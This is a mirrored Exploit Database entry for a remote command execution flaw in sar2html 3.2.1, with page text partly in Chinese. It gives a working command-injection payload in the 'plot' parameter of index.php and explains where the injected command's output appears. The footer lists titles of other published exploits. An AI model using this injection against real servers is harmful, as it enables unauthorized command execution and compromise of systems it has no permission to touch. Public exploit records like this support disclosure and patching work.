Sar2HTML 3.2.1 – Remote Command Execution

Exploit Database
13 阅读

作者： Cemal Cihad ÇİFTÇİ

日期： 2019-08-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/47204/

# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.

last Exploits
Sar2HTML 3.2.1 – Remote Command Execution的更多信息

Lavalite v9.0.0 – XSRF-TOKEN cookie File path traversal：
BloofoxCMS – ‘/bloofox/index.php?Username’ SQL Injection：
ePhone Disk 1.0.2 iOS – Multiple Vulnerabilities：
Payara Micro Community 5.2021.6 – Directory Traversal：
ZTE ZXDSL-931VII – Configuration Dump：
LeptonCMS 7.0.0 – Remote Code Execution (RCE) (Authenticated)：
Event Calendar PHP 1.5 – SQL Injection：
OpenMRS 2.3 (1.11.4) – Multiple Cross-Site Scripting Vulnerabilities：